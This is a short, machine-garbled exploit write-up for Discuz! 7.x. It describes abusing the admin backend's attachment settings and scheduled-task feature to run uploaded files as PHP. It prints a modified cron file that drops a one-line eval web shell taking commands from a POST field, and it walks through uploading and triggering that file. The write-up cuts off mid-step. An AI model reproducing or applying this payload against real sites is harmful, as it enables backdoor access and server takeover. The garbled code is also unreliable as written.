Discuz! 7. X arbitrary code execution in the background

 

Because the scheduled task function does not limit the file name, you only need to upload the file to the/include/crons/directory for execution.

First, go to the global attachment settings to modify the upload directory.

Then take the scheduled task file that exists directly.

/Include/crons/announcements_daily.inc.php:

<? Php/* [Discuz!] (C) 2001-2009 Comsenz Inc. This is NOT a freeware, use is subject to license terms $ Id: announcements_daily.inc.php 17476 02: 58: 18Z liuqiang $ */if (! Defined ('in _ discuz') {exit ('Access Denied ');} fputs (fopen ('1. php', 'w'),' <? Php eval ($ _ POST [cmd)?> \ R \ n');?>

 

I am a saved 11.txt file and post a new post to any part of the forum that can upload files.

You can obtain the upload path and file name through attachment management in the background.

What I show here is 1307312134da261a93f37e3656.txt. Remember this file name and write it to the scheduled task.

After submission, execute 1. php to generate